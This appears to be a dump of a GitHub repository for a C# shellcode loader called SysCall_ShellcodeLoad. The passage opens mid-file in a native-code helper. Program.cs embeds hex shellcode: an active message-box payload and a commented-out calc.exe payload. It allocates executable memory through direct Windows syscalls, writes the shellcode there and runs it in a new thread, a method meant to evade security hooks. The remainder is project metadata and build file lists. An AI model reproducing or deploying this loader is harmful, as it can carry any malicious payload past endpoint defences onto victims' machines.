{ 198 | // set byte array of bNtWaitForSingleObject to new byte array called syscall 199 | byte[] syscall = CuNtWFSO; 200 | 201 | // specify unsafe context 202 | unsafe 203 | { 204 | // create new byte pointer and set value to our syscall byte array 205 | fixed (byte* ptr = syscall) 206 | { 207 | // cast the byte array pointer into a C# IntPtr called memoryAddress 208 | IntPtr memoryAddress = (IntPtr)ptr; 209 | 210 | // Change memory access to RX for our assembly code 211 | if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)syscall.Length, PAGE_EXECUTE_READWRITE, out uint oldprotect)) 212 | { 213 | throw new Win32Exception(); 214 | } 215 | 216 | // Get delegate for NtWaitForSingleObject 217 | DelegatesStruct.NtWaitForSingleObject assembledFunction = (DelegatesStruct.NtWaitForSingleObject)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(DelegatesStruct.NtWaitForSingleObject)); 218 | 219 | return (uint)assembledFunction(Object, Alertable, Timeout); 220 | } 221 | } 222 | } 223 | 224 | 225 | public struct DelegatesStruct 226 | { 227 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 228 | public delegate uint NtAllocateVirtualMemory( 229 | IntPtr ProcessHandle, 230 | ref IntPtr BaseAddress, 231 | IntPtr ZeroBits, 232 | ref UIntPtr RegionSize, 233 | ulong AllocationType, 234 | ulong Protect); 235 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 236 | public delegate uint NtCreateThreadEx( 237 | out IntPtr hThread, 238 | uint DesiredAccess, 239 | IntPtr ObjectAttributes, 240 | IntPtr ProcessHandle, 241 | IntPtr lpStartAddress, 242 | IntPtr lpParameter, 243 | bool CreateSuspended, 244 | uint StackZeroBits, 245 | uint SizeOfStackCommit, 246 | uint SizeOfStackReserve, 247 | IntPtr lpBytesBuffer 248 | ); 249 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 250 | public delegate uint NtWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout); 251 | } 252 | 253 | 254 | } 255 | 256 | 257 | } 258 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Runtime.InteropServices; 7 | using static SysCall_ShellcodeLoad.NativeCode; 8 | 9 | namespace SysCall_ShellcodeLoad 10 | { 11 | class Program 12 | { 13 | static void Main(string[] args) 14 | { 15 | /* Messagebox shellcode */ 16 | 17 | byte[] buf1 = new byte[328] { 18 | 0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0xe8, 0xd0, 0x00, 0x00, 19 | 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 20 | 0x48, 0x8b, 0x52, 0x60, 0x3e, 0x48, 0x8b, 0x52, 0x18, 0x3e, 0x48, 0x8b, 21 | 0x52, 0x20, 0x3e, 0x48, 0x8b, 0x72, 0x50, 0x3e, 0x48, 0x0f, 0xb7, 0x4a, 22 | 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 23 | 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 24 | 0x41, 0x51, 0x3e, 0x48, 0x8b, 0x52, 0x20, 0x3e, 0x8b, 0x42, 0x3c, 0x48, 25 | 0x01, 0xd0, 0x3e, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 26 | 0x74, 0x6f, 0x48, 0x01, 0xd0, 0x50, 0x3e, 0x8b, 0x48, 0x18, 0x3e, 0x44, 27 | 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x5c, 0x48, 0xff, 0xc9, 0x3e, 28 | 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 29 | 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 30 | 0xf1, 0x3e, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd6, 31 | 0x58, 0x3e, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x3e, 0x41, 32 | 0x8b, 0x0c, 0x48, 0x3e, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x3e, 33 | 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 34 | 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 35 | 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x3e, 0x48, 0x8b, 0x12, 36 | 0xe9, 0x49, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xc7, 0xc1, 0x00, 0x00, 0x00, 37 | 0x00, 0x3e, 0x48, 0x8d, 0x95, 0x1a, 0x01, 0x00, 0x00, 0x3e, 0x4c, 0x8d, 38 | 0x85, 0x35, 0x01, 0x00, 0x00, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x45, 0x83, 39 | 0x56, 0x07, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x41, 0xba, 0xa6, 40 | 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 41 | 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 42 | 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x48, 0x65, 0x6C, 0x6C, 0x6F, 43 | 0x20, 0x77, 0x6F, 0x72, 0x6C, 0x64, 0x20, 0x76, 0x69, 0x61, 0x20, 0x73, 44 | 0x79, 0x73, 0x63, 0x61, 0x6C, 0x6C, 0x00, 0x41, 0x50, 0x49, 0x20, 0x54, 45 | 0x65, 0x73, 0x74, 0x00 46 | }; 47 | 48 | /* 49 | byte[] buf1 = new byte[193] { 50 | 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30, 51 | 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff, 52 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52, 53 | 0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1, 54 | 0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b, 55 | 0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03, 56 | 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 57 | 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24, 58 | 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb, 59 | 0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f, 60 | 0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5, 61 | 0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a, 62 | 0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 63 | }; 64 | */ 65 | 66 | IntPtr pMemoryAllocation = IntPtr.Zero; 67 | IntPtr pZeroBits = IntPtr.Zero; 68 | UIntPtr pAllocationSize = new UIntPtr(Convert.ToUInt32(buf1.Length)); 69 | uint MEM_COMMIT = 0x1000; 70 | uint MEM_RESERVE = 0x2000; 71 | uint PAGE_EXECUTE_READWRITE = 0x00000040; 72 | 73 | uint ntAllocResult = Auto_NativeCode.NtAllocateVirtualMemory( 74 | GetCurrentProcess(), 75 | ref pMemoryAllocation, 76 | pZeroBits, 77 | ref pAllocationSize, 78 | MEM_COMMIT | MEM_RESERVE, 79 | PAGE_EXECUTE_READWRITE 80 | ); 81 | 82 | 83 | Console.WriteLine("AllocResult: " + ntAllocResult); 84 | 85 | Marshal.Copy(buf1, 0, (IntPtr)(pMemoryAllocation), buf1.Length); 86 | 87 | IntPtr hThread = IntPtr.Zero; 88 | 89 | uint STANDARD_RIGHTS_ALL = 0x001F0000; 90 | uint SPECIFIC_RIGHTS_ALL = 0x0000FFFF; 91 | 92 | uint hThreadResult = Auto_NativeCode.NtCreateThreadEx( 93 | out hThread, 94 | STANDARD_RIGHTS_ALL | SPECIFIC_RIGHTS_ALL, 95 | IntPtr.Zero, 96 | GetCurrentProcess(), 97 | pMemoryAllocation, 98 | IntPtr.Zero, 99 | false, 100 | 0, 101 | 0xFFFF, 102 | 0xFFFF, 103 | IntPtr.Zero 104 | ); 105 | 106 | Console.WriteLine("hThreadResult: " + hThreadResult); 107 | uint result = Auto_NativeCode.NtWaitForSingleObject(hThread, true, 0); 108 | 109 | // Auto_NativeCode.GetSyscallID("NtAllocateVirtualMemory"); 110 | return; 111 | } 112 | } 113 | } 114 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // 有关程序集的一般信息由以下 6 | // 控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("SysCall_ShellcodeLoad")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SysCall_ShellcodeLoad")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // 将 ComVisible 设置为 false 会使此程序集中的类型 18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型 19 | //请将此类型的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("a9dec923-e66d-46d5-84ee-6d4733ff44ce")] 24 | 25 | // 程序集的版本信息由下列四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 生成号 30 | // 修订号 31 | // 32 | //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值 33 | //通过使用 "*",如下所示: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/SysCall_ShellcodeLoad.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE} 8 | Exe 9 | SysCall_ShellcodeLoad 10 | SysCall_ShellcodeLoad 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | true 26 | 27 | 28 | AnyCPU 29 | pdbonly 30 | true 31 | bin\Release\ 32 | TRACE 33 | prompt 34 | 4 35 | true 36 | 37 | 38 | true 39 | bin\x64\Debug\ 40 | DEBUG;TRACE 41 | true 42 | full 43 | x64 44 | 7.3 45 | prompt 46 | true 47 | 48 | 49 | bin\x64\Release\ 50 | TRACE 51 | true 52 | true 53 | pdbonly 54 | x64 55 | 7.3 56 | prompt 57 | true 58 | 59 | 60 | true 61 | bin\x86\Debug\ 62 | DEBUG;TRACE 63 | true 64 | full 65 | x86 66 | 7.3 67 | prompt 68 | true 69 | 70 | 71 | bin\x86\Release\ 72 | TRACE 73 | true 74 | true 75 | pdbonly 76 | x86 77 | 7.3 78 | prompt 79 | true 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/bin/Debug/SysCall_ShellcodeLoad.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/bin/Debug/SysCall_ShellcodeLoad.exe -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/bin/Debug/SysCall_ShellcodeLoad.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/bin/Debug/SysCall_ShellcodeLoad.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/bin/Debug/SysCall_ShellcodeLoad.pdb -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/bin/x64/Debug/SysCall_ShellcodeLoad.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/bin/x64/Debug/SysCall_ShellcodeLoad.exe -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/bin/x64/Debug/SysCall_ShellcodeLoad.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/bin/x64/Debug/SysCall_ShellcodeLoad.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/bin/x64/Debug/SysCall_ShellcodeLoad.pdb -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/bin/x86/Debug/SysCall_ShellcodeLoad.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/bin/x86/Debug/SysCall_ShellcodeLoad.exe -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/bin/x86/Debug/SysCall_ShellcodeLoad.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/bin/x86/Debug/SysCall_ShellcodeLoad.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/bin/x86/Debug/SysCall_ShellcodeLoad.pdb -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 1f63402e3013b79f2110ed506a2056a94be577d2 2 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\Debug\SysCall_ShellcodeLoad.exe.config 2 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\Debug\SysCall_ShellcodeLoad.exe 3 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\Debug\SysCall_ShellcodeLoad.pdb 4 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\Debug\SysCall_ShellcodeLoad.csprojAssemblyReference.cache 5 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\Debug\SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache 6 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\Debug\SysCall_ShellcodeLoad.exe 7 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\Debug\SysCall_ShellcodeLoad.pdb 8 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.exe -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/Debug/SysCall_ShellcodeLoad.pdb -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/x64/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 8f7d3b6a18ccceae44f2b5f784143258a3709cea 2 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\whyteedeng\source\repos\SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x64\Debug\SysCall_ShellcodeLoad.exe.config 2 | C:\Users\whyteedeng\source\repos\SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x64\Debug\SysCall_ShellcodeLoad.exe 3 | C:\Users\whyteedeng\source\repos\SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x64\Debug\SysCall_ShellcodeLoad.pdb 4 | C:\Users\whyteedeng\source\repos\SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.csprojAssemblyReference.cache 5 | C:\Users\whyteedeng\source\repos\SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache 6 | C:\Users\whyteedeng\source\repos\SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.exe 7 | C:\Users\whyteedeng\source\repos\SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.pdb 8 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x64\Debug\SysCall_ShellcodeLoad.exe.config 9 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x64\Debug\SysCall_ShellcodeLoad.exe 10 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x64\Debug\SysCall_ShellcodeLoad.pdb 11 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.csprojAssemblyReference.cache 12 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache 13 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.exe 14 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x64\Debug\SysCall_ShellcodeLoad.pdb 15 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.exe -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x64/Debug/SysCall_ShellcodeLoad.pdb -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/x86/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | bf7bf3ec09ad6ed738d5aa95fa9246d5c7e47f68 2 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x86\Debug\SysCall_ShellcodeLoad.exe.config 2 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x86\Debug\SysCall_ShellcodeLoad.exe 3 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\bin\x86\Debug\SysCall_ShellcodeLoad.pdb 4 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x86\Debug\SysCall_ShellcodeLoad.csprojAssemblyReference.cache 5 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x86\Debug\SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache 6 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x86\Debug\SysCall_ShellcodeLoad.exe 7 | C:\Project\Projects\Project_SysCall_ShellcodeLoad\SysCall_ShellcodeLoad\obj\x86\Debug\SysCall_ShellcodeLoad.pdb 8 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.exe -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/SysCall_ShellcodeLoad/obj/x86/Debug/SysCall_ShellcodeLoad.pdb --------------------------------------------------------------------------------